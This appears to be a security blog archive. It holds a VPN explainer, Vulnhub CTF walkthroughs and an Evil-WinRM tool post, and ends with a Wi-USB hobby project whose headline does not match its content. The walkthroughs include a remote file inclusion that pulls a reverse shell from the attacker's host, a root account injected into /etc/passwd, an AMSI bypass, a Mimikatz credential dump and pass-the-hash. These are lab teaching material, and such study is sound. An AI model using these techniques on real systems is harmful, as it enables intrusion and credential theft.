Sunday, May 28, 2023

How VPN Technology Protects Your Privacy from Hackers

 

Introduction

Picture this: the year is 2020. People store their most sensitive data online, blindly trust that it is safe, and do nothing to protect it. Criminals can break into those people’s computers and steal everything, ruining their lives.

This isn’t the plot to a dystopian movie; this is real life.

Cyber Attacks

Cyber attacks happen every day, and few people do anything about them. Even on the heels of enormous data breaches last year, people were mostly unfazed, despite reports that 7.9 billion consumer records were exposed, which is terrifying. It may simply be that people aren’t familiar with using a VPN.

Why is VPN Useful?

A VPN is a means of protecting someone when they’re online.

A way to think about life online is someone driving an empty bus. Every time that person performs any action online, they get a passenger to walk into the bus. That passenger has a briefcase with invoices, receipts, time spent on the page, and pages the driver visited. The big problem is that passengers will never get off the bus. Every new page clicked online equals a new passenger on the bus.

There are a few problems with this situation. First, the briefcases have no locks. Whoever holds one can open it and read every document inside.

This leads to the second point. The documents enclosed are incredibly private and sensitive. They could contain Social Security and credit card numbers, a huge list of transaction history, as well as a timestamp of every site ever visited.

Some people may not see this as an issue. As long as they’re driving the bus and they keep the door closed, why should they have to worry?

Well, if the driver did anything illegal and the police pull them over, the police can look in every single briefcase on that bus. Even worse, if a criminal hijacks the bus, they can take every briefcase for themselves.

This is where a VPN comes in. A VPN acts as a second, unregistered, self-driving bus.

Now, when the user makes an interaction online, the passenger goes into the self-driving bus with their briefcase. The internet user’s bus will stay empty at all times.

The other key point is that these passengers’ briefcases are mostly empty. No names are attached to the information, and the sensitive contents are encrypted and unreadable in transit. One caveat: the encryption covers the leg between the user and the VPN server. The VPN provider, and the sites the user visits, still see the traffic on the far side of the tunnel, so the provider itself has to be trusted.

VPN is a Universal Concept

All across the globe, people want to protect their sensitive information. Luckily, a VPN is not region-specific: an American can use a VPN server in Australia or India, and many providers offer servers on several continents.

Using a VPN server in another country does not add any extra encryption. What changes is which network, and which jurisdiction, sees the user’s traffic leaving the tunnel, which can matter for who is able to compel the provider to hand over logs.

Who is a VPN for?

This should not be misconstrued, though. A VPN is not just for criminals who want to stay invisible while they break the law. In fact, notorious online criminals have been found and arrested despite their VPN usage. No, a VPN is not for criminals.

A VPN should ideally be used for anyone who uses the internet. It keeps information private and keeps people safe.

Ultimately, it’s taking matters into one’s own hands. It’s been proven time and time again that companies do not value customer information as much as the customers do. They don’t take the necessary precautions. This leads to breach after breach of customer information over the years.

The way a customer’s information stays safe is if the customer keeps it safe. A VPN should be used by anyone who accesses the internet.

Other Uses for a VPN

A VPN is not just used to keep data secure, there are actually a lot of uses.

Some countries restrict internet usage heavily. For example, over the years several countries have blocked Facebook outright. The blocks work on the user’s IP address, which is mapped to a physical location. A VPN replaces the user’s visible IP address with the VPN server’s, so someone in a country that blocks a site can still reach it through a server elsewhere.

Another common use of a VPN is the corporate VPN. With one set up, employees can connect from home and reach their office workstation and internal services. It works on the same principle as the Facebook example: the employee’s traffic enters the office network through the VPN server, so internal systems treat the connection as if it came from inside the office. A VPN lets office workers work from home without any problem.

Sometimes sites like Netflix, Hulu, or Pandora only allow people in a certain country to enjoy certain content. This can get frustrating and oftentimes it’s due to contract agreements. This is yet another place where a VPN shines. The user can put on their VPN mask and access content that would otherwise be inaccessible from continents away.

Conclusion

Overall there are a lot of interesting facts and uses for VPNs. They protect people from eavesdropping, they keep the user’s traffic private in transit, and they keep hackers on the local network away from the user’s sensitive information.

VPNs are useful for anyone who accesses the internet. They can help people in countries with internet restrictions, help office workers work from home, and allow people to view content from other countries. It’s a very interesting technology, and as the world develops there are sure to be more uses for it.

Saturday, June 13, 2020

HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: ISRO”. We have developed this lab for online penetration testing practice. Solving it is not that tough if you have proper basic knowledge of penetration testing. Let’s start and learn how to breach it.
Download Here
Level: Intermediate
Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

  • Scanning Network
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing HTTP Service
    • Performing Directory Bruteforce
  • Exploitation
    • LFI
    • Create PHP reverse shell
    • Reading /etc/passwd file
    • Getting a reverse connection
    • Spawning a TTY Shell
  • Privilege Escalation
    • Writable /etc/passwd File

Walkthrough

Scanning Network

First of all we identify our target, using the following command:
netdiscover
Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:
nmap -A 192.168.1.104

Enumeration

From the nmap scan we now know that ports 22 and 80 are open, running SSH and HTTP respectively. Since port 80 is open, we open the target IP address in our browser as shown in the following image:
http://192.168.1.104
It opened a webpage as shown in the above image. Here we found the Bhaskara page, so now we opened and found an information webpage there as shown in the image below:
http://192.168.1.104/bhaskara.html
As a convention, we will enumerate the webpage by going through the source code. We see that we have the Bhaskara Launch Code. This seems a base64 encoded text.
Now we got to decode it. To do this we will be using the combination of the echo command and the base64 -d.
echo "L2JoYXNrYXJh" | base64 -d
After decoding the base64 encoded text we get “/bhaskara”. This seems a hint that there might be a directory named bhaskara.
So, we went to our browser to open the bhaskara directory. Browsing that URL downloads a file of about 2MB. After examining the file, we realized it is a TrueCrypt volume.
To crack the volume password, we first extract its hash with true.py (a TrueCrypt-to-john hash extractor; you can download it from the link above). We saved the script as true.py, wrote the hash to a file, and ran john against it. Note that --show only prints passwords john has already cracked, so john must first be run on the hashes file (for example with a wordlist) before --show. The password came out as xavier.
python true.py bhaskara > hashes
john hashes --show
Since it is a TrueCrypt volume, it might be hiding something inside. So we opened it with VeraCrypt by providing its path and selecting a free volume slot as shown in the image.
Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier i.e. ‘xavier’ 
 It opened up to show a text file labelled ‘flag.txt’. We opened it; it gave us our first flag. Bhaskara Flag.
Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}
Let’s move forward with enumeration. We also performed a directory scan, which gave us an /img directory. A second scan with the .php extension turned up a connect.php.
dirb http://192.168.1.104
dirb http://192.168.1.104 -X .php
We went into the /img directory. Here we found an image called aryabhata.jpg.
We downloaded aryabhata.jpg and opened it.
Upon opening it we found it to be the poster for Aryabhata satellite as shown in the image given below.
As we couldn’t find anything specific with the image, we suspected that there is some steganography involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag. 
steghide extract -sf aryabhata.jpg
cat flag.txt
Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back in the web browser, connect.php from our dirb bruteforce gave us nothing on its own. Its file parameter suggested file inclusion rather than command injection, so we tested it by requesting /etc/passwd through it. As the image shows, it is a File Inclusion vulnerability. (Including a remote URL, as we do next, works only because PHP’s allow_url_include is enabled on this box.)
192.168.1.104/connect.php?file=/etc/passwd
We edited shell.php to insert the attacker machine’s IP address and saved it. Now we need to serve it to the target, so we started a Python HTTP server with the one-liner shown below.
nano shell.php
python -m SimpleHTTPServer
We will catch the reverse connection with netcat, so we start a listener on the port set in the shell file.
nc -lvp 1234
After starting the listener on the attacker machine, we make the target fetch and execute the shell through the File Inclusion vulnerability.
192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php
Upon execution, the shell gave us a session on the target machine. As seen in the image, it wasn’t a proper TTY, so we used a Python one-liner to upgrade it.
python3 -c 'import pty;pty.spawn("/bin/bash")'
We used netstat to check which addresses and ports the target is listening on, and found a service on port 3306 bound to localhost only. The most common service on port 3306 is MySQL, so let’s enumerate in that direction.
netstat -antp
We tried logging in to MySQL as root, which worked without a password. After logging in, we enumerated the databases and found one named ‘flag’. Looking inside its tables gave us our third flag, the Mangalyaan Flag.
mysql -u root 
show databases;
use flag;
show tables;
select * from flag;
Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way to move forward.
ls -la /etc/passwd
Now we need a password hash for the user we will add to /etc/passwd. We use openssl to generate a salted MD5-crypt ($1$) hash, which the passwd file accepts directly in its password field:
openssl passwd -1 -salt user3 pass123
Back in our remote shell on the target, we use the hash from the previous step to add a user raj with UID 0 and GID 0, i.e. root privileges, by appending a line to /etc/passwd with echo. We then check the entry with tail. Now all we need is su with the new username and the password pass123, and we have a root shell. In /root we find the final flag, the Chandrayaan Flag.
echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd
tail /etc/passwd
su raj
Password: pass123
cd /root
ls
cat final.txt
Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2} 
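As an added check for the escalation above (example code, not from the original walkthrough), the following POSIX shell functions flag the two things it relies on and leaves behind: a world-writable /etc/passwd and an extra UID-0 account carrying an inline hash. The passwd content mentioned in the comments is constructed, not taken from the target.

```shell
#!/bin/sh
# Added check for the /etc/passwd technique above (not part of the original
# walkthrough). One function flags the misconfiguration that made the
# escalation possible; the other two flag the artifact it leaves behind.

# Print the names of every account with UID 0 other than root.
# A hit here is exactly what 'raj:...:0:0::/root:/bin/bash' produces.
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Succeed (exit 0) when the file's "other" write bit is set, i.e. any local
# user can append a line to it. Reads the ls -l mode string, which is portable.
world_writable() {
    [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# Count accounts whose password field holds a hash directly in passwd instead
# of 'x' (shadowed) or a locked marker. The injected entry carries its
# MD5-crypt hash inline, so it shows up here.
inline_hashes() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { n++ } END { print n+0 }' "$1"
}

# Stand-alone use against the live file (constructed sample used in testing):
#   extra_uid0 /etc/passwd
#   world_writable /etc/passwd && echo "/etc/passwd is world-writable"
#   inline_hashes /etc/passwd
```

Run the three functions against /etc/passwd from a low-privilege shell before attempting the escalation, or from a forensic image afterwards; any UID-0 name other than root, or a non-zero inline hash count, is worth explaining.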

Wednesday, June 10, 2020

Evil-Winrm : Winrm Pentesting Framework


In this post we discuss the best-known tool for remote PowerShell shells, “Evil-Winrm”. It is an open-source tool, available on GitHub, for WinRM penetration testing.

Table of Content

  • Evil-winrm
  • Features
  • Installation
  • Load PowerShell scripts
  • Pass the Hash
  • Install using its Docker image

Evil-winrm

This program can be used against any Microsoft Windows server with WinRM enabled (usually on port 5985, or 5986 for HTTPS), provided you already have credentials and permission to use it. So it belongs in the post-exploitation phase of a hack or pentest. Its purpose is to provide nice, easy-to-use features for that work. System administrators can use it for legitimate purposes as well, but most of its features are focused on hacking and pentesting.
Features
  • Compatible to Linux and Windows client systems
  • Load in memory Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) assemblies bypassing some AVs
  • Load x64 payloads generated with awesome donut technique
  • AMSI Bypass
  • Pass-the-hash support
  • Kerberos auth support
  • SSL and certificates support
  • Upload and download files showing a progress bar
  • List remote machine services without privileges
  • Command History
  • WinRM command completion
  • Local files completion
  • Colorization on prompt and output messages (can be disabled optionally)
  • Docker support (prebuilt images available at Dockerhub)
  • Trap capturing to avoid accidental shell exit on Ctrl+C

Installation 

In this post we cover two easy methods to install evil-winrm on Kali Linux; the GitHub page lists more.
With Ruby gem you can install evil-winrm directly; it pulls in all the dependencies when you run the following command.
gem install evil-winrm
Once installed, running ‘evil-winrm’ with no arguments prints the help, with the syntax and options for running it against a Windows Remote Management service.
Now we use evil-winrm to get a shell on the remote machine by connecting to port 5985, where WinRM is listening. It gives us a PowerShell prompt on the victim as shown below.
Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’>
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'
Besides the shell itself, it provides a menu of loadable functions such as Invoke-Binary, Dll-Loader, Donut-Loader and Bypass-4MSI.

Load PowerShell scripts

We have some pentesting PowerShell scripts in /root/powershell, and evil-winrm can load these .ps1 scripts on the host machine.
The .ps1 scripts must be in the directory passed with the -s argument; run it as shown below:
Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’> -s <path>
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell
Type menu again to see the loaded functions, run Bypass 4MSI first, and then invoke the script. Here we load the Invoke-Mimikatz PowerShell script to dump stored credentials.
menu
Bypass 4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz
As a result, it dumped the credentials stored on the Windows server.

Pass the Hash

It has one more feature that allows you to conduct a Pass the Hash attack: supplying the user’s NT hash in place of the password gives the same shell on the host machine.
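As an added example for pass-the-hash (example code, not part of evil-winrm), here is a small POSIX shell helper that takes a dumped credential line in the user:rid:lmhash:nthash::: layout, validates the NT hash field, and builds the evil-winrm command that passes it with -H (evil-winrm’s NT-hash option) instead of -p. The sample line is constructed; the hashes in it are the well-known empty-password LM and NT values, not real credentials.

```shell
#!/bin/sh
# Added helper for the pass-the-hash feature above (example code, not part of
# evil-winrm). evil-winrm takes the NT hash with -H instead of a password with -p.
# Dumped credentials usually arrive one account per line in the
# user:rid:lmhash:nthash::: layout; the common mistake is to pass the wrong field
# or the whole lm:nt pair, so the hash is checked before the command is built.

# Print the NT hash from a user:rid:lm:nt::: line; fail if it is not 32 hex chars.
nt_hash_of() {
    nt=$(printf '%s\n' "$1" | cut -d: -f4)
    case "$nt" in
        *[!0-9a-fA-F]*|"") return 1 ;;
    esac
    [ ${#nt} -eq 32 ] || return 1
    printf '%s\n' "$nt"
}

# Build (but do not run) the evil-winrm pass-the-hash command line for a host.
pth_command() {
    host=$1
    line=$2
    user=$(printf '%s\n' "$line" | cut -d: -f1)
    nt=$(nt_hash_of "$line") || return 1
    printf 'evil-winrm -i %s -u %s -H %s\n' "$host" "$user" "$nt"
}

# Constructed sample line (not real credentials): the LM and NT fields are the
# well-known hashes of an empty password.
SAMPLE='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::'

# pth_command 192.168.1.105 "$SAMPLE" prints:
# evil-winrm -i 192.168.1.105 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
```

Pipe the output into a shell, or copy it, once you have confirmed the host and user; the helper deliberately prints the command rather than executing it.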

Install using its Docker image

This is an easy and convenient way to get evil-winrm onto your attacking machine: the prebuilt Docker image runs the tool and connects straight to the victim’s WinRM service with the credentials you supply. Only one command is needed.
docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

Friday, May 29, 2020

Zion Vulnhub Walkthrough

Today, I am going to share a writeup for the boot2root challenge of the Vulnhub machine “Zion”. It is an intermediate box based on Linux. The goal for this machine is to read the flag.txt file.

Penetration Testing Methodology

  • Network Scanning
    • Netdiscover scan
    • Nmap Scan
  • Enumeration
    • Enumerating HTTP service on Browser
    • Inspecting the Login Panel using BurpSuite
    • Decoding Base64 and Base62 messages
  • Exploitation
    • Crafting the Dictionary using Cewl
    • Bruteforcing using BurpSuite
    • Enumerating the Web Application
  • Post Exploitation
    • Connecting using SSH
    • Enumerating for Sudo Rights
  • Privilege Escalation
    • Abusing Sudo Rights on cp
Walkthrough

Network Scanning

We begin by scanning our network for the target machine using Netdiscover. The target machine is active on 192.168.1.109. Let’s scan it and see which services are running and which ports are open.
We do an aggressive scan on the target using nmap.
nmap -p- -A 192.168.1.109

Enumeration

The scan gives us a lot of good and useful information, but what stands out the most is that port 22 and 80 are open, let’s explore port 80 first and see what we can find there.
Here we see two buttons, “Truth” and “Illusion”, a red pill and blue pill choice like the one Morpheus gives Neo in the Matrix trilogy. Clicking the Truth button takes us to a login page.
After looking around the login panel for some time, I decided to inspect it with BurpSuite. I captured the request and sent it to the Repeater. Checking the response, we see some odd parameters whose values appear to be encoded.
Guessing that the encoding might be Base64, I decoded the banner value with the Decoder. This gave us a message that tells us to “Open our mind”, and also tells us to avoid some characters.
This means the message left for us is not exactly Base64. Dropping the characters the message names leaves a 62-character alphabet, i.e. Base62. So, let’s decode the message with a Base62 decoder; you can find one online.
The decoded message gives us hints for the credentials to “Zion’s Systems”. It tells us to look at the choice page we were on a few moments before, gives us the username “morpheus.thematrix”, and says the user likes to keep simple passwords.

Exploitation

There are multiple ways to try to get the password. We could try manually, but when we have tools that can do this for us, why waste the time? I decided to build a dictionary for the login bruteforce using cewl. Cewl is simple to use: provide the URL and an output file path, and it creates a dictionary from all the words on the webpage.
cewl http://192.168.1.109/ -w dict.txt
For the brute force we use BurpSuite’s Intruder module. To use Intruder, we capture the request sent by the “Login” button with some sample text in the password box.
Now that we have the request, we can use it to brute force the login with Intruder. I used “test” as the sample text. The request can be sent to Intruder with the shortcut “Ctrl + I”.
After sending the request to Intruder, we go to the Positions Tab. Here we select the Attack type as Sniper. After setting the Attack type we need to specify the Payload Positions. This is the particular text that is going to be brute-forced. Here we want to brute force the password parameter. So we select the “test” as a place holder. Add the “§” symbol around the text as shown in the image given below by clicking the “Add §” button.
Next, we moved onto the Payloads Tab. Here we have multiple sections to provide the type of payload we want to provide for the bruteforce. Payload here means the dictionary that we created using Cewl previously. We need to provide the Simple list in the Payload type option under the Payload Sets section. Next, we need to add the contents of the dictionary we created. For this we will use the Load button in the Payload Options section. This will open up a window where we can browse the dictionary we created. After doing the above steps we click on the Start attack button.
Clicking Start attack opens yet another window where we can watch Burp Suite send a request for each entry in the dictionary. The request with the password “interpreted” gets a redirect response, unlike the others, which suggests it is the right password. Time to check it out.
We go back to the Login Panel, and try the following credentials to login.
Username: morpheus.thematrix
Password: interpreted
This opens up Zion’s System. Here we see some information about the user w.rabbit: the user has forgotten his password, so the Administrator has disabled password logins for the account but did something “related to the movies” (The Matrix, I suppose). I also see a link for a Private key in the top right, as shown in the image below.
The link leads to a page called rabbit-hole/rsa_priv_key_for_w.rabbit.txt. This is a private key for the user w.rabbit, so we should be able to log in over SSH with it.

Post Exploitation

I copied the contents of the key into an empty file and saved it as “key”. Since port 22 is open on the target, we log in over SSH with this key. Some enumeration turns up warning.txt, which tells us to find the flag at the path mentioned and gives us the freedom to use any method or technique we want. Enumerating further in the mail directory, I found the credentials for the user w.rabbit. We are already logged in as w.rabbit, but with the password we can use sudo. To find out what we can run with elevated permissions we check sudo -l, and we see that the cp command can be run as the user dozer.
ssh -i key w.rabbit@192.168.1.109
cat warning.txt
cat w.rabbit.txt
sudo -l
This means we can run the cp command through sudo as dozer; sudo asks for w.rabbit’s own password, which we just recovered.

Privilege Escalation

In the step above we saw that /bin/cp can be run through sudo as dozer, and during enumeration we recovered w.rabbit’s sudo password. So, let’s use /bin/cp via /bin/sudo to escalate to dozer’s files. Using cp, we copy flag.txt into /tmp and display it with the commands below. The --no-preserve=mode,ownership option matters: by default cp copies the source file’s permission bits, so a copy of a file readable only by dozer would still be unreadable to w.rabbit, whereas with --no-preserve=mode the new file gets default permissions (0666 masked by the umask) and we can read it.
/bin/sudo -u dozer /bin/cp --no-preserve=mode,ownership /home/dozer/flag.txt /tmp/flag.txt
cat /tmp/flag.txt
Here we got our /home/dozer/flag.txt. That’s it for now. See you next time.
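As an added triage helper for the sudo -l step above (example code, not from the original walkthrough), the following POSIX shell functions pull the (runas) binary pairs out of sudo -l output and flag binaries that copy or print file contents, since running one of those as another user, as with /bin/cp as dozer here, reads that user’s files. The sudo -l text in the block is constructed to match the box; the hostname zion and the extra (root) /usr/bin/id line are assumptions for illustration.

```shell
#!/bin/sh
# Added triage helper for 'sudo -l' output (example code, not from the
# original walkthrough). Reads sudo -l text on stdin.

# Print "runas binary" for each rule line. Rule lines are indented and look like
# "    (dozer) /bin/cp" or "    (root) NOPASSWD: /usr/bin/find"; the command is
# the last field and the runas user is the parenthesised first field.
sudo_rules() {
    awk '
        /^ *\(/ {
            runas = $1; gsub(/[()]/, "", runas)   # "(dozer)" -> "dozer"
            bin = $NF                              # command path is the last field
            print runas, bin
        }'
}

# Small list (an assumption, not exhaustive) of binaries whose normal use copies
# or prints file contents. Run via sudo as another user they expose that user's
# files, which is exactly what /bin/cp as dozer gave us above.
FILE_TOOLS="cp mv cat dd tee less more head tail tar"

# Print the rules whose binary base name is in FILE_TOOLS, as "runas binary".
flag_file_tools() {
    sudo_rules | while read -r runas bin; do
        base=${bin##*/}
        for t in $FILE_TOOLS; do
            if [ "$base" = "$t" ]; then
                printf '%s %s\n' "$runas" "$bin"
            fi
        done
    done
}

# Constructed sudo -l output matching the box (hostname and the id line assumed).
SAMPLE_SUDO='Matching Defaults entries for w.rabbit on zion:
    env_reset, mail_badpass

User w.rabbit may run the following commands on zion:
    (dozer) /bin/cp
    (root) NOPASSWD: /usr/bin/id'

# On a live box:  sudo -l | flag_file_tools
# On the sample:  printf '%s\n' "$SAMPLE_SUDO" | flag_file_tools   -> dozer /bin/cp
```

The list is intentionally short; extend FILE_TOOLS with whatever your own checklist covers, and treat any flagged pair as a lead to verify by hand rather than a confirmed path to the other user.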


Friday, May 22, 2020

Protect Your USB ports from USB killer with Wi-USB

For Wireless USB for Instant IoT

Short explanation:
This is a device that lets you connect almost any USB device to your computer without a USB cable. It wraps USB messages in IP messages and presents a simple virtual COM port on your PC. The device is a true USB host, so you can use it to make almost any USB device wireless almost instantly.
It works very reliably (as long as your Wi-Fi signal strength is not poor), and seems to be the quickest way to get a project both wireless and on the internet.
Long explanation:
Imagine if you will: You have an Arduino connected to your PC via good old USB. THEN....you cut that USB cable in half, and attach an antenna to either cable stump. Then, you move the Arduino further away from your computer, maybe you even move it to the other side of house.
You click "Upload" in the Arduino IDE and voila!...the sketch uploads successfully. If your sketch has the Arduino writing over serial, you can even open the serial monitor and your data comes through, no problem.
Oh you don't use Arduinos? Okay, maybe you use a USB webcam, or a USB-controlled 3D printer, a normal printer, a USB nerf turret...or even some other fancy new microcontroller. Either way, it is now totally wireless, and you didn't need to write (or even copy and paste) a single line of code.
That's what I wanted, and, as is typical for me, what pretty much didn't exist. 
So I did it myself!
Here is how it works: The Linux Single-Board-Computer (SBC) inside the 3D printed case has a "USB host" port, which basically means it can have slave devices (arduinos, flash drives, 3D printers, etc) connect to it. Your PC has lots of host ports, whereas your Arduino has none. That's why you can't connect two Arduinos together via USB (not without a host shield at least, and even then, you'd need drivers!).
SO, we have a USB host port. That's the first step in the right direction. Now, we need the Linux SBC to be connected to your home wireless network. Let's skip the details for now, but take my word for it...that part is easy. Great, now our Linux SBC is on your wifi!
Then, we connect something...(let's say an Arduino for now, as an example)...to the USB host port on the Linux SBC.
This is when the Linux SBC starts doing something sneaky and clever. It reads the USB messages zooming to and from your Arduino and uses the USB/IP protocol to wrap them up into little IP messages. These IP messages (secretly USB messages) are sent over your network back to your PC. Your PC runs software that converts them back into USB messages and feeds them into a "virtual USB port", which is a real USB port as far as your PC is concerned. One caveat: USB/IP itself carries no authentication or encryption, so anyone on the same network who can reach the SBC’s USB/IP port can attach the device; keep it on a trusted network.
After that, you're good to go - Device Manager will show that an Arduino is connected on COM-XYZ. Fire up the Arduino IDE and upload a sketch, it works, no problem. From here on out, the system behaves as if you are connected directly via USB....but you know better. The little bugger is actually all the way upstairs, tending to your automated houseplant watering system. 
Side rant about why I went down this track:
Now that it is the year 2017, it seems like every project is supposed to be an "IoT" project of some kind.
I've done my fair share of ESP8266 projects, but as a relatively weak coder, it usually ends up slowing me down a LOT when it comes time to code up a little nodejs page or parsing some long string of data from one or more sensors.
The last ten years has seen a literal revolution in accessibility to powerful tools for hobbyists and engineers, but connecting stuff to the internet (or just being wireless in any sense) continues to be a challenge if you aren't a strong programmer. Admittedly, the learning curve is better than it has ever been, but I am spoiled and I want to connect my projects to the internet in...a minute.....and have it be over with and just work.
There are some pretty great products out there now (and even greater community support and how-to articles!) but I still feel like there is a little gap when it comes to INSTANT IoT. That's why I did this project, and I hope that some people in this community will like it!
